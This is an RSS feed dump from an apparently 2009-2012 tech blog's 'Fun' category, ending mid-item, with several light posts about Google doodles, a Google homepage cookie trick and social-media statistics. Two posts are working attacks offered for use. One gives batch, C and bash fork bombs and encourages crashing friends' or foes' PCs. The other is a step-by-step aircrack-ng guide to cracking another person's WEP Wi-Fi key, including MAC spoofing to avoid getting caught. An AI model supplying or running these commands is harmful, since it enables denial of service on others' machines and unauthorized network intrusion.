<?xml version="1.0" encoding="UTF-8"?> <rss version="2.0" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:wfw="http://wellformedweb.org/CommentAPI/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:sy="http://purl.org/rss/1.0/modules/syndication/" xmlns:slash="http://purl.org/rss/1.0/modules/slash/" ><channel><title>ViralPatel.net &#187; Fun</title> <atom:link href="http://viralpatel.net/blogs/category/fun/feed" rel="self" type="application/rss+xml" /><link>http://viralpatel.net/blogs</link> <description>Tutorials, Java, J2EE, Struts, AJAX, JavaScript, CSS, Web 2.0, MySQL, Articles</description> <lastBuildDate>Tue, 24 Jan 2012 13:45:10 +0000</lastBuildDate> <language>en</language> <sy:updatePeriod>hourly</sy:updatePeriod> <sy:updateFrequency>1</sy:updateFrequency> <generator>http://wordpress.org/?v=3.3.1</generator> <item><title>Simplest Virus – Fork Bomb</title><link>http://viralpatel.net/blogs/2010/01/simplest-virus-fork-bomb.html</link> <comments>http://viralpatel.net/blogs/2010/01/simplest-virus-fork-bomb.html#comments</comments> <pubDate>Tue, 12 Jan 2010 20:07:42 +0000</pubDate> <dc:creator>Rishabh Dangwal</dc:creator> <category><![CDATA[Fun]]></category> <category><![CDATA[c language]]></category> <category><![CDATA[hacked]]></category> <category><![CDATA[security]]></category><guid isPermaLink="false">http://viralpatel.net/blogs/?p=1988</guid> <description><![CDATA[A virus (as you know) is a piece of code that does something that it shouldn&#8217;t. It is a common misconception that you need a vast skill set to make these and that they are extremely complex however in reality they are as simple as sin to make which is why they are so damn [...]]]></description> <content:encoded><![CDATA[<p><img src="http://img.viralpatel.net/2010/01/fork-bomb.png" alt="fork-bomb" title="fork-bomb" width="207" height="128" class="alignright size-full wp-image-1989" />A virus (as you know) is a piece of code that does something that it shouldn&#8217;t. It is a common misconception that you need a vast skill set to make these and that they are extremely complex however in reality they are as simple as sin to make which is why they are so damn annoying.<br /> A Fork bomb is considered to be the smallest writable virus in the batch language and it is capable of being annoying and if launched on a home computer however on a server will probably result in a crash.<br /> A fork bomb creates two instances which each create two instances and so on&#8230;The processes recursively fork; this &#8220;forks&#8221; the processor and jamm it completely until a crash occurs.</p><p>Here is how to make it.</p><h2>Notepad Fork Bomb</h2><p>Open up notepad and type:</p><pre class="brush: cpp; title: ; notranslate">
%0|%0
</pre><p>and save it as fork.bat Yep..its a virus of just 5 characters <img src='http://viralpatel.net/blogs/wp-includes/images/smilies/icon_razz.gif' alt=':P' class='wp-smiley' /> .<br /> On double clicking this file,it will lead to total CPU jam by opening about 500+ process of command prompt.</p><h2>C Fork Bomb</h2><p>Here is a in C++ version of Fork bomb.</p><pre class="brush: cpp; title: ; notranslate">
#include &lt;unistd.h&gt;
int main(void)
{
  while(1)
    fork();
  return 0;
}
</pre><h2>Shell Script Fork Bomb</h2><p>And a shell (Unix/bash) version.</p><pre class="brush: bash; title: ; notranslate">
: (){ : |:&amp; };:
</pre><p>Once a successful fork bomb has activated in a system, one may have to reboot to resume normal operation. Stopping a fork bomb requires destroying all running instances of it. Trying to use a program to kill the rogue processes normally requires creating another process a difficult or impossible task as it will totally use memory for its instances.<br /> You can get creative and try to use program executables or call system applications or utilities recursively in the same manner and increase the damage manifolds. Let your creativity run loose.<br /> Use it for crashing your friends/foe’s PC <img src='http://viralpatel.net/blogs/wp-includes/images/smilies/icon_razz.gif' alt=':P' class='wp-smiley' /><br /> <em>Cheers</em></p><style type="text/css">#author-info{font-family:Helvetica,Arial,Helvetica,sans-serif;width:650px;height:130px;background-color:#f4f4f4;border:1px
solid #eee}#author-info #a-pic{width:90px;height:75%;display:inline;float:left;padding:15px}#author-info #a-pic #a-avatar{border-bottom:1px solid #999;border-right:1px solid #999;padding:2px;background-color:white;height:80px;width:80px}#author-info #a-pic #a-avatar
img{border:0px
solid;padding:0px}#author-info #a-details{width:520px;height:75%;display:inline;float:right;padding:15px
10px 0px 0px}#author-info #a-details #a-about{color:#0C3FC4;font-size:1.13em;font-weight:bold;margin-bottom:3px}#author-info #a-details #a-det{font-size:14px}</style><div id="author-info"><div id="a-pic"><div id="a-avatar"> <img src="http://img.viralpatel.net/author/rishabh-dangwal.jpg" /></div></div><div id="a-details"><div id="a-about"> About the Author</div><div id="a-det"> <a href="http://www.prohack.in" rel="nofollow" target="_blank">Rishabh Dangwal</a> is a freelance security consultant, technoblogger and a student pursuing engineering. His tastes include fiddling with every possible piece of computers and technology he could get his hands on and sharing them to the world.</div></div></div><div id="relatedpost"><h2  class="related_post_title">Related Posts</h2><ul class="related_post"><li><a href="http://viralpatel.net/blogs/2010/12/password-protect-your-webpages-using-htaccess.html" title="Password Protect your webpages using htaccess">Password Protect your webpages using htaccess</a></li><li><a href="http://viralpatel.net/blogs/2010/02/step-by-step-guide-to-crack-winrar.html" title="Step by step Guide to Crack WinRAR">Step by step Guide to Crack WinRAR</a></li><li><a href="http://viralpatel.net/blogs/2010/01/google-takes-china-stop-censoring.html" title="Google Takes on China; Will Stop Censoring Results">Google Takes on China; Will Stop Censoring Results</a></li><li><a href="http://viralpatel.net/blogs/2010/01/hacking-wifi-network-using-backtrack.html" title="Hacking Wifi Network Using BackTrack">Hacking Wifi Network Using BackTrack</a></li><li><a href="http://viralpatel.net/blogs/2009/09/how-to-create-ie-specific-css-stylesheet.html" title="How To: Create an IE Specific Stylesheet">How To: Create an IE Specific Stylesheet</a></li><li><a href="http://viralpatel.net/blogs/2009/09/take-database-automate-backup-website.html" title="Taking Backup of your Website and Wordpress Blog">Taking Backup of your Website and Wordpress Blog</a></li><li><a href="http://viralpatel.net/blogs/2009/05/hiding-an-extension.html" title="Hiding an Extension">Hiding an Extension</a></li></ul></div>]]></content:encoded> <wfw:commentRss>http://viralpatel.net/blogs/2010/01/simplest-virus-fork-bomb.html/feed</wfw:commentRss> <slash:comments>0</slash:comments> </item> <item><title>Hacking Wifi Network Using BackTrack</title><link>http://viralpatel.net/blogs/2010/01/hacking-wifi-network-using-backtrack.html</link> <comments>http://viralpatel.net/blogs/2010/01/hacking-wifi-network-using-backtrack.html#comments</comments> <pubDate>Mon, 11 Jan 2010 07:00:57 +0000</pubDate> <dc:creator>Rishabh Dangwal</dc:creator> <category><![CDATA[Fun]]></category> <category><![CDATA[General]]></category> <category><![CDATA[hacked]]></category> <category><![CDATA[hacking wifi]]></category> <category><![CDATA[linux]]></category> <category><![CDATA[social networking]]></category><guid isPermaLink="false">http://viralpatel.net/blogs/?p=1978</guid> <description><![CDATA[Wifi or Wireless Fidelity is the name of a popular wireless networking technology that uses radio waves to provide wireless high-speed Internet and network connections (as if you didnt know..),Wifi has become an integral part of our lives today. Wifi is secured using a WPA protocol which intends to secure Wireless LANs like Wired LAN’s [...]]]></description> <content:encoded><![CDATA[<p><img src="http://img.viralpatel.net/2010/01/wifi-hacked.png" alt="wifi-hacked" title="wifi-hacked" width="158" height="177" class="alignright size-full wp-image-1979" />Wifi or Wireless Fidelity is the name of a popular wireless networking technology that uses radio waves to provide wireless high-speed Internet and network connections (as if you didnt know..),Wifi has become an integral part of our lives today. Wifi is secured using a WPA protocol which intends to secure Wireless LANs like Wired LAN’s by encrypting data over radio waves,however, it has been found that WEP is not as secure as once believed.Now almost anyone can hack into a Wifi network by generating the valid WEP key using Bactrack. Read on to learn how..</p><p><em><strong>Disclaimer:</strong> This tutorial is given for educational purposes only and that for any misuse of this information; the blogger cannot be held liable.</em></p><h2>GETTING BACKTRACK</h2><p>BackTrack is a slax based top rated Linux live distribution focused on penetration testing which consists of more than 300 up to date tools along with the ability of customizing scripts, configuring and modding kernels which makes it a true gem and a must have for every security enthusiastic out there. The best part &#8211; Its free and you can download it from &#8211; <a rel="nofollow" target="_blank" href="http://www.remote-exploit.org/backtrack_download.html"><strong>Remote Exploit</strong></a></p><h2>SETTING UP THE CARD AND THE CONSOLE</h2><p>Boot up Backtrack on your virtual machine/laptop and open up the command console and type the commands as they are given -</p><pre class="brush: bash; title: ; notranslate">
ifconfig
</pre><p>This is the Linux equivalent of <code>ipconfig</code>, you will see the network adaptors in your system. See which one is for Wi-Fi. A few examples are wlan0, wifi0, etc.</p><pre class="brush: bash; title: ; notranslate">
airmon-ng
</pre><p>This command will initialize the Wi-Fi network monitoring &#038; will tell you how many networks are in range.</p><pre class="brush: bash; title: ; notranslate">
airmon-ng stop [Wi-Fi Card name(without the quotes)]
</pre><p>This command will stop the cards broadcast and reception immediately</p><pre class="brush: bash; title: ; notranslate">
macchanger –mac [Desired MAC address] [Wi-Fi card name]
</pre><p>This command will change the current MAC address to any MAC address you desire, so that you don’t get caught later</p><pre class="brush: bash; title: ; notranslate">
airmon-ng start [Wi-Fi Card name]
</pre><p>You will see another extra adaptor that is set on monitor mode, use that adaptor for all further purposes in the following commands where – &#8220;[Wi-Fi card name]&#8221; appears</p><h2>DUMPING PACKETS</h2><p>Once you have set up all the parameters, you need to sniff and dump data packets in order to get the key. You can do so by using following commands. On the command console type these commands -</p><pre class="brush: bash; title: ; notranslate">
airodump-ng [Wi-Fi card name]
</pre><p>Copy and paste the BSSID in the following command and execute it</p><pre class="brush: bash; title: ; notranslate">
airodump-ng –c [Channel Number] –w [Desired Filename for later decryption] --bssid [BSSID] [Wi-Fi Card name]
</pre><p>As you execute the command, you will see a certain number of beacons and data packets that will be stored in the filename you have given. The file will be stored in the root of the system drive (Click on Computer and you will see the file).The file will be present in two formats: *.cap, *.txt.</p><h2>SPEEDING UP THINGS</h2><p>However packet dumping is quite a slow process, we need to speed up things to save our time. Open new console after the first data packet has been stored and type the command in the new console and execute it.</p><pre class="brush: bash; title: ; notranslate">
airreplay-ng -1 0 –a [BSSID] –h [FAKED MAC ADDRESS] -e [Wi-Fi name (you wish to hack)] [Wi-Fi card name]
</pre><p>As you type this command you will see that the data packets required for breaking the key will increase dramatically thereby saving you a lot of time.</p><h2>REVEALING WEP KEY</h2><p>Open another console once you have around 20,000 data packets and type the following command to reveal the WEP key.</p><pre class="brush: bash; title: ; notranslate">
aircrack-ng –n 64 –b [BSSID] [Filename without the extension]
</pre><p><img src="http://img.viralpatel.net/2010/01/wep-wifi-hacked.png" alt="wep-wifi-hacked" title="wep-wifi-hacked" width="122" height="126" class="alignright size-full wp-image-1980" />As you type this command, you will see that a key will appear in front of you in the given below format:<br /> <strong>XX:XX:XX:XX</strong></p><p>It is not necessary that the key should have exactly the same digits as shown above so please don’t freak out if you see a 10 digit or 14 digit key. Also if the decryption fails, you can change the bit level of the decryption in the command:</p><pre class="brush: bash; title: ; notranslate">
aircrack-ng –n [BIT LEVEL] –b [BSSID] [Filename without extension]
</pre><p>Remember, the bit level should be a number of 2n where n:1,2,3,4…<br /> e.g.</p><pre class="brush: bash; title: ; notranslate">
aircrack-ng –n 32 –b [BSSID] [Filename without the extension]
OR
aircrack-ng –n 128 –b [BSSID] [Filename without the extension] etc. etc.
</pre><p>Now just login using the WEP key you got.</p><p><em>Cheers..</em></p><style type="text/css">#author-info{font-family:Helvetica,Arial,Helvetica,sans-serif;width:650px;height:130px;background-color:#f4f4f4;border:1px
solid #eee}#author-info #a-pic{width:90px;height:75%;display:inline;float:left;padding:15px}#author-info #a-pic #a-avatar{border-bottom:1px solid #999;border-right:1px solid #999;padding:2px;background-color:white;height:80px;width:80px}#author-info #a-pic #a-avatar
img{border:0px
solid;padding:0px}#author-info #a-details{width:520px;height:75%;display:inline;float:right;padding:15px
10px 0px 0px}#author-info #a-details #a-about{color:#0C3FC4;font-size:1.13em;font-weight:bold;margin-bottom:3px}#author-info #a-details #a-det{font-size:14px}</style><div id="author-info"><div id="a-pic"><div id="a-avatar"> <img src="http://img.viralpatel.net/author/rishabh-dangwal.jpg" /></div></div><div id="a-details"><div id="a-about"> About the Author</div><div id="a-det"> <a href="http://www.prohack.in" rel="nofollow" target="_blank">Rishabh Dangwal</a> is a freelance security consultant, technoblogger and a student pursuing engineering. His tastes include fiddling with every possible piece of computers and technology he could get his hands on and sharing them to the world.</div></div></div><div id="relatedpost"><h2  class="related_post_title">Related Posts</h2><ul class="related_post"><li><a href="http://viralpatel.net/blogs/2010/02/step-by-step-guide-to-crack-winrar.html" title="Step by step Guide to Crack WinRAR">Step by step Guide to Crack WinRAR</a></li><li><a href="http://viralpatel.net/blogs/2010/01/google-takes-china-stop-censoring.html" title="Google Takes on China; Will Stop Censoring Results">Google Takes on China; Will Stop Censoring Results</a></li><li><a href="http://viralpatel.net/blogs/2010/01/simplest-virus-fork-bomb.html" title="Simplest Virus – Fork Bomb">Simplest Virus – Fork Bomb</a></li><li><a href="http://viralpatel.net/blogs/2009/12/compile-run-google-chromium-os-linux.html" title="Complete Guide To Compile &#038; Run Google Chromium OS on Linux">Complete Guide To Compile &#038; Run Google Chromium OS on Linux</a></li><li><a href="http://viralpatel.net/blogs/2009/09/how-to-create-ie-specific-css-stylesheet.html" title="How To: Create an IE Specific Stylesheet">How To: Create an IE Specific Stylesheet</a></li><li><a href="http://viralpatel.net/blogs/2009/04/omg-salma-hayek-apple-mobileme-account-hacked.html" title="OMG: Salma Hayek&#8217;s Apple MobileMe account Hacked!!">OMG: Salma Hayek&#8217;s Apple MobileMe account Hacked!!</a></li><li><a href="http://viralpatel.net/blogs/2009/04/google-android-adt-sdk-and-eclipse-ide-integration-on-linux.html" title="Google Android ADT, SDK and Eclipse IDE integration on Linux ">Google Android ADT, SDK and Eclipse IDE integration on Linux </a></li></ul></div>]]></content:encoded> <wfw:commentRss>http://viralpatel.net/blogs/2010/01/hacking-wifi-network-using-backtrack.html/feed</wfw:commentRss> <slash:comments>5</slash:comments> </item> <item><title>Google&#8217;s First Animated Doodle for Newton&#8217;s Anniversary</title><link>http://viralpatel.net/blogs/2010/01/google-first-doodle-newton-anniversary.html</link> <comments>http://viralpatel.net/blogs/2010/01/google-first-doodle-newton-anniversary.html#comments</comments> <pubDate>Mon, 04 Jan 2010 09:52:46 +0000</pubDate> <dc:creator>Viral Patel</dc:creator> <category><![CDATA[Fun]]></category> <category><![CDATA[News]]></category> <category><![CDATA[google]]></category> <category><![CDATA[google doodle]]></category><guid isPermaLink="false">http://viralpatel.net/blogs/?p=1975</guid> <description><![CDATA[Google changes its logo frequently to celebrate events such as birth anniversaries of well known people, holiday seasons etc. These logos are known as Google Doodle. Today Google is celebrating 366th birthday of Sir Isaac Newton and they have changed the logo on their website. But this time they have added an animated doodle of [...]]]></description> <content:encoded><![CDATA[<p>Google changes its logo frequently to celebrate events such as birth anniversaries of well known people, holiday seasons etc. These logos are known as Google Doodle.</p><p>Today Google is celebrating 366th birthday of <a target="_blank" href="http://en.wikipedia.org/wiki/Isaac_Newton">Sir Isaac Newton</a> and they have changed the logo on their website. But this time they have added an animated doodle of falling apple.</p><p><img alt="" src="http://img.labnol.org/files/google_logo_animated.gif" title="google doodle animated" class="aligncenter" width="504" height="384" /></p><p>Google believe in simplicity and thus the animated doodle is not a GIF or Flash but simple JavaScript to animate the image.</p><pre class="brush: jscript; title: ; notranslate">
&lt;img width=&quot;384&quot; height=&quot;138&quot; border=&quot;0&quot; onload=&quot;window.lol&amp;amp;&amp;amp;lol();setTimeout(function(){var h=0,v=1,f=document.getElementById('fall'),i=setInterval(function(){if(f){var r=parseInt(f.style.right)+h,b=parseInt(f.style.bottom)-v;f.style.right=r+'px';f.style.bottom=b+'px';if(b&gt;-210){v+=2}else{h=(v&gt;9)?v*0.1:0;v*=(v&gt;9)?-0.3:0}}},25);google.rein&amp;amp;&amp;amp;google.rein.push(function(){clearInterval(i);h=0;v=1})},2000)&quot; style=&quot;margin-top: -1.22em;&quot; id=&quot;logo&quot; title=&quot;Birthday of Sir Isaac Newton&quot; alt=&quot;Birthday of Sir Isaac Newton&quot; src=&quot;/logos/newton10-tree.jpg&quot;/&gt;
</pre><p>You can access full set of Google Doodle here <a rel="nofollow" target="_blank" href="http://www.google.com/logos/">http://www.google.com/logos/</a></p><div id="relatedpost"><h2  class="related_post_title">Related Posts</h2><ul class="related_post"><li><a href="http://viralpatel.net/blogs/2009/11/google-wave-fail-whale.html" title="Google Wave has its own Fail Whale">Google Wave has its own Fail Whale</a></li><li><a href="http://viralpatel.net/blogs/2008/11/from-where-google-brought-logo-of-chrome.html" title="From where Google brought logo of Chrome">From where Google brought logo of Chrome</a></li><li><a href="http://viralpatel.net/blogs/2011/07/google-plus-homepage-redirect.html" title="Redirect your homepage /+ URL to your Google + profile">Redirect your homepage /+ URL to your Google + profile</a></li><li><a href="http://viralpatel.net/blogs/2010/01/google-takes-china-stop-censoring.html" title="Google Takes on China; Will Stop Censoring Results">Google Takes on China; Will Stop Censoring Results</a></li><li><a href="http://viralpatel.net/blogs/2009/12/the-unofficial-google-text-to-speech-api.html" title="The Unofficial Google Text-To-Speech API">The Unofficial Google Text-To-Speech API</a></li><li><a href="http://viralpatel.net/blogs/2009/12/compile-run-google-chromium-os-linux.html" title="Complete Guide To Compile &#038; Run Google Chromium OS on Linux">Complete Guide To Compile &#038; Run Google Chromium OS on Linux</a></li><li><a href="http://viralpatel.net/blogs/2009/11/go-google-programming-language.html" title="GO: Google Launches its own Programming Language">GO: Google Launches its own Programming Language</a></li></ul></div>]]></content:encoded> <wfw:commentRss>http://viralpatel.net/blogs/2010/01/google-first-doodle-newton-anniversary.html/feed</wfw:commentRss> <slash:comments>2</slash:comments> </item> <item><title>Google Wave has its own Fail Whale</title><link>http://viralpatel.net/blogs/2009/11/google-wave-fail-whale.html</link> <comments>http://viralpatel.net/blogs/2009/11/google-wave-fail-whale.html#comments</comments> <pubDate>Tue, 03 Nov 2009 15:55:15 +0000</pubDate> <dc:creator>Viral Patel</dc:creator> <category><![CDATA[Fun]]></category> <category><![CDATA[News]]></category> <category><![CDATA[google]]></category> <category><![CDATA[google wave]]></category> <category><![CDATA[tech stories]]></category><guid isPermaLink="false">http://viralpatel.net/blogs/?p=1890</guid> <description><![CDATA[Twitter users are very well aware of Fail Whale image that pops up whenever twitter is down due to some reason. Twitter&#8217;s fail whale also has fan site &#8211; http://failwhale.com/ Google Wave has its own similar feature which is shown when Wave is down for maintenance. It seems that Google Wave&#8217;s maintenance page can be [...]]]></description> <content:encoded><![CDATA[<p>Twitter users are very well aware of Fail Whale image that pops up whenever twitter is down due to some reason. Twitter&#8217;s fail whale also has fan site &#8211; <a rel="nofollow" target="_new" href="http://failwhale.com/">http://failwhale.com/</a></p><p>Google Wave has its own similar feature which is shown when Wave is down for maintenance.<br /> <img src="http://img.viralpatel.net/2009/11/google-wave-fail-whale.png" alt="google-wave-fail-whale" title="google-wave-fail-whale" width="80%" height="80%" class="aligncenter size-full wp-image-1891" /></p><p>It seems that Google Wave&#8217;s maintenance page can be still seen when the service is up and running:<br /> <a target="_new" rel="nofollow" href="http://wave.google.com/maintenance/index.html">http://wave.google.com/maintenance/index.html</a></p><p>For those who know jQuery, try to see the source code of the above Google Wave failwhale page. They have used jQuery for animating the clouds and waves.</p><div id="relatedpost"><h2  class="related_post_title">Related Posts</h2><ul class="related_post"><li><a href="http://viralpatel.net/blogs/2011/07/google-plus-homepage-redirect.html" title="Redirect your homepage /+ URL to your Google + profile">Redirect your homepage /+ URL to your Google + profile</a></li><li><a href="http://viralpatel.net/blogs/2010/01/google-first-doodle-newton-anniversary.html" title="Google&#8217;s First Animated Doodle for Newton&#8217;s Anniversary">Google&#8217;s First Animated Doodle for Newton&#8217;s Anniversary</a></li><li><a href="http://viralpatel.net/blogs/2009/11/go-google-programming-language.html" title="GO: Google Launches its own Programming Language">GO: Google Launches its own Programming Language</a></li><li><a href="http://viralpatel.net/blogs/2009/08/pillows-try-social-media-pillow.html" title="Pillows for you: Try these Social Media Pillow">Pillows for you: Try these Social Media Pillow</a></li><li><a href="http://viralpatel.net/blogs/2009/07/google-os-is-here-google-launched-google-chrome-os.html" title="Google OS is here. Google launched Google Chrome OS">Google OS is here. Google launched Google Chrome OS</a></li><li><a href="http://viralpatel.net/blogs/2009/06/china-blocks-google-search-apps-gmail.html" title="China blocks Google Search, Apps, GMail etc">China blocks Google Search, Apps, GMail etc</a></li><li><a href="http://viralpatel.net/blogs/2009/05/gmail-launched-automatic-message-translation-feature-gmail-labs.html" title="GMail launched automatic message translation feature in GMail Labs">GMail launched automatic message translation feature in GMail Labs</a></li></ul></div>]]></content:encoded> <wfw:commentRss>http://viralpatel.net/blogs/2009/11/google-wave-fail-whale.html/feed</wfw:commentRss> <slash:comments>0</slash:comments> </item> <item><title>How to make your Google home page Buttonless</title><link>http://viralpatel.net/blogs/2009/10/google-home-page-buttonless.html</link> <comments>http://viralpatel.net/blogs/2009/10/google-home-page-buttonless.html#comments</comments> <pubDate>Wed, 14 Oct 2009 13:41:08 +0000</pubDate> <dc:creator>Viral Patel</dc:creator> <category><![CDATA[Fun]]></category> <category><![CDATA[google]]></category> <category><![CDATA[google search]]></category><guid isPermaLink="false">http://viralpatel.net/blogs/?p=1864</guid> <description><![CDATA[Google always tries new things to make it homepage look better and work more efficient. It has one of the simplest homepage among all websites. Recently Google made few changes in its homepage. The page features exactly two elements: Google’s famous logo, and its search box. That is, until you move your mouse, when a [...]]]></description> <content:encoded><![CDATA[<p><img class="alignnone" src="http://tctechcrunch.files.wordpress.com/2009/10/sparta.png?w=640" alt="google button less" /><br /> Google always tries new things to make it homepage look better and work more efficient. It has one of the simplest homepage among all websites.<br /> Recently Google made few changes in its homepage. The page features exactly two elements: Google’s famous logo, and its search box. That is, until you move your mouse, when a nifty fade effect reveals with rest of Google’s standard navigation options. Alas, most people don’t have the option enabled, and are forced to endure Google.com’s beefy 30+ words at all times.</p><p>To enable this feature follow the simple steps:</p><ol><li>Goto google.com</li><li> Paste the following code into the address bar of your<pre class="brush: jscript; title: ; notranslate">
browser:javascript:void(document.cookie=&quot;PREF=ID=2602f2ce49362929:U=7b6893b1882d5a94:TM=1239881060:LM=1254195610:L=0qXJlAA:GM=1:S=CwDGQD20E8U14zDg;path=/;
domain=.google.com&quot;);
</pre></li><li>Hit enter or ‘go’ to run it (you have to be on google.com at the time). It will not give you any feedback, it will just run and set the cookie.</li><li>Refresh the page.</li></ol><p>If you fade up with this feature and want your old Google homepage back; Just clear the cookies from your browser and it will reset your Google homepage.</p><div id="relatedpost"><h2  class="related_post_title">Related Posts</h2><ul class="related_post"><li><a href="http://viralpatel.net/blogs/2009/03/tip-for-you-using-firefox-google-calculator.html" title="Tip for you: Using Firefox as a Calculator">Tip for you: Using Firefox as a Calculator</a></li><li><a href="http://viralpatel.net/blogs/2011/07/google-plus-homepage-redirect.html" title="Redirect your homepage /+ URL to your Google + profile">Redirect your homepage /+ URL to your Google + profile</a></li><li><a href="http://viralpatel.net/blogs/2010/01/google-takes-china-stop-censoring.html" title="Google Takes on China; Will Stop Censoring Results">Google Takes on China; Will Stop Censoring Results</a></li><li><a href="http://viralpatel.net/blogs/2010/01/google-first-doodle-newton-anniversary.html" title="Google&#8217;s First Animated Doodle for Newton&#8217;s Anniversary">Google&#8217;s First Animated Doodle for Newton&#8217;s Anniversary</a></li><li><a href="http://viralpatel.net/blogs/2009/12/the-unofficial-google-text-to-speech-api.html" title="The Unofficial Google Text-To-Speech API">The Unofficial Google Text-To-Speech API</a></li><li><a href="http://viralpatel.net/blogs/2009/12/compile-run-google-chromium-os-linux.html" title="Complete Guide To Compile &#038; Run Google Chromium OS on Linux">Complete Guide To Compile &#038; Run Google Chromium OS on Linux</a></li><li><a href="http://viralpatel.net/blogs/2009/11/go-google-programming-language.html" title="GO: Google Launches its own Programming Language">GO: Google Launches its own Programming Language</a></li></ul></div>]]></content:encoded> <wfw:commentRss>http://viralpatel.net/blogs/2009/10/google-home-page-buttonless.html/feed</wfw:commentRss> <slash:comments>0</slash:comments> </item> <item><title>What if the Facebook is a Country?</title><link>http://viralpatel.net/blogs/2009/08/what-if-facebook-is-country.html</link> <comments>http://viralpatel.net/blogs/2009/08/what-if-facebook-is-country.html#comments</comments> <pubDate>Fri, 28 Aug 2009 13:09:41 +0000</pubDate> <dc:creator>Viral Patel</dc:creator> <category><![CDATA[Fun]]></category> <category><![CDATA[Web 2.0]]></category> <category><![CDATA[facebook]]></category><guid isPermaLink="false">http://viralpatel.net/blogs/?p=1703</guid> <description><![CDATA[Facebook has made its way from a small social network website running in a university to a giant mammoth of 250 Million users worldwide. Buzzpoint, a social media marketing firm based out of Los Angeles, has put together an impressive visualization that shows off just how large Facebook has grown. The comparison has been done [...]]]></description> <content:encoded><![CDATA[<p>Facebook has made its way from a small social network website running in a university to a giant mammoth of 250 Million users worldwide. <a rel="nofollow" href="http://www.buzzpoint.com/">Buzzpoint</a>, a social media marketing firm based out of Los Angeles, has put together an impressive visualization that shows off just how large Facebook has grown. The comparison has been done with different Countries in terms of population and facebook users.</p><h2>Facebook as 4th largest country in world in terms of population</h2><p><img alt="Faceb" src="http://cache0.techcrunch.com/wp-content/uploads/2009/08/fbfigures1.png" class="aligncenter" width="632" height="402" /></p><h2>Top five countries with most facebook users</h2><p><img alt="five countries with most facebook users" src="http://cache0.techcrunch.com/wp-content/uploads/2009/08/fbstats2.png" class="aligncenter" width="630" height="383" /></p><h2>Facebook as terms of % of populations</h2><p><img alt="Facebook as terms of % of populations" src="http://cache0.techcrunch.com/wp-content/uploads/2009/08/fbstats3.png" class="aligncenter" width="632" height="420" /></p><p>Image Courtesy: <a rel="nfollow" href="http://www.techcrunch.com/2009/08/27/a-look-at-facebooks-reach-worldwide/">Techcrunch</a></p><div id="relatedpost"><h2  class="related_post_title">Related Posts</h2><ul class="related_post"><li><a href="http://viralpatel.net/blogs/2009/08/pillows-try-social-media-pillow.html" title="Pillows for you: Try these Social Media Pillow">Pillows for you: Try these Social Media Pillow</a></li><li><a href="http://viralpatel.net/blogs/2012/01/scroll-fix-header-jquery-facebook.html" title="Facebook Style Scroll Fixed Header in JQuery">Facebook Style Scroll Fixed Header in JQuery</a></li><li><a href="http://viralpatel.net/blogs/2010/06/facebook-facts-you-didnt-know.html" title="Facebook: Facts you probably didnt know">Facebook: Facts you probably didnt know</a></li><li><a href="http://viralpatel.net/blogs/2010/01/google-first-doodle-newton-anniversary.html" title="Google&#8217;s First Animated Doodle for Newton&#8217;s Anniversary">Google&#8217;s First Animated Doodle for Newton&#8217;s Anniversary</a></li><li><a href="http://viralpatel.net/blogs/2009/11/google-wave-fail-whale.html" title="Google Wave has its own Fail Whale">Google Wave has its own Fail Whale</a></li><li><a href="http://viralpatel.net/blogs/2009/08/if-twitter-consisted-of-100-people.html" title="If Twitter Consisted of 100 People!">If Twitter Consisted of 100 People!</a></li><li><a href="http://viralpatel.net/blogs/2009/07/precrime-minority-report-real-facebook-england.html" title="Pre-crime &#038; Minority Report turns real through Facebook in England">Pre-crime &#038; Minority Report turns real through Facebook in England</a></li></ul></div>]]></content:encoded> <wfw:commentRss>http://viralpatel.net/blogs/2009/08/what-if-facebook-is-country.html/feed</wfw:commentRss> <slash:comments>0</slash:comments> </item> <item><title>If Twitter Consisted of 100 People!</title><link>http://viralpatel.net/blogs/2009/08/if-twitter-consisted-of-100-people.html</link> <comments>http://viralpatel.net/blogs/2009/08/if-twitter-consisted-of-100-people.html#comments</comments> <pubDate>Mon, 17 Aug 2009 15:34:42 +0000</pubDate> <dc:creator>Viral Patel</dc:creator> <category><![CDATA[Fun]]></category> <category><![CDATA[twitter]]></category><guid isPermaLink="false">http://viralpatel.net/blogs/?p=1670</guid> <description><![CDATA[What if the popular microblogging website, Twitter had only 100 users? Based on the data from a survey InformationIsBeautiful blog has constructed these gorgeous graphics showing the Twitter (Twitter) community represented as 100 people. Following conclusion can be drawn from this wonderful picture: There are more Women than Men Most of Twitter users are lazy. [...]]]></description> <content:encoded><![CDATA[<p>What if the popular microblogging website, <a rel="nofollow" href="http://twitter.com">Twitter</a> had only 100 users?</p><p>Based on the data from a survey <a rel="nofollow" href="http://www.informationisbeautiful.net/2009/more-truth-about-twitter/">InformationIsBeautiful</a> blog has constructed these gorgeous graphics showing the Twitter (Twitter) community represented as 100 people.</p><p>Following conclusion can be drawn from this wonderful picture:</p><ul><li>There are more Women than Men</li><li>Most of Twitter users are lazy. They don&#8217;t tweet frequently</li><li>Wednesday is best to promote yourself <img src='http://viralpatel.net/blogs/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /></li><li>Most news are tweeted on Tuesday that means, most incidents happens on Tuesday <img src='http://viralpatel.net/blogs/wp-includes/images/smilies/icon_wink.gif' alt=';-)' class='wp-smiley' /></li><li>Only 8% tweets are good and worth retweeting</li></ul><p><img alt="If Twitter had 100 Users" src="http://s3.amazonaws.com/infobeautiful/twitter2_550.gif" title="If Twitter had 100 Users" class="aligncenter" width="499" height="1344" /></p><p>Image courtesy: <a rel="nofollow" href="http://www.informationisbeautiful.net/2009/more-truth-about-twitter/">InformationIsBeautiful</a></p><div id="relatedpost"><h2  class="related_post_title">Related Posts</h2><ul class="related_post"><li><a href="http://viralpatel.net/blogs/2009/08/pillows-try-social-media-pillow.html" title="Pillows for you: Try these Social Media Pillow">Pillows for you: Try these Social Media Pillow</a></li><li><a href="http://viralpatel.net/blogs/2010/02/did-twitter-forget-to-update-copyright-year.html" title="Did Twitter Forget to Update its Copyright Year?">Did Twitter Forget to Update its Copyright Year?</a></li><li><a href="http://viralpatel.net/blogs/2010/01/google-first-doodle-newton-anniversary.html" title="Google&#8217;s First Animated Doodle for Newton&#8217;s Anniversary">Google&#8217;s First Animated Doodle for Newton&#8217;s Anniversary</a></li><li><a href="http://viralpatel.net/blogs/2009/11/following-viralpatelnet.html" title="Following @viralpatelnet">Following @viralpatelnet</a></li><li><a href="http://viralpatel.net/blogs/2009/11/google-wave-fail-whale.html" title="Google Wave has its own Fail Whale">Google Wave has its own Fail Whale</a></li><li><a 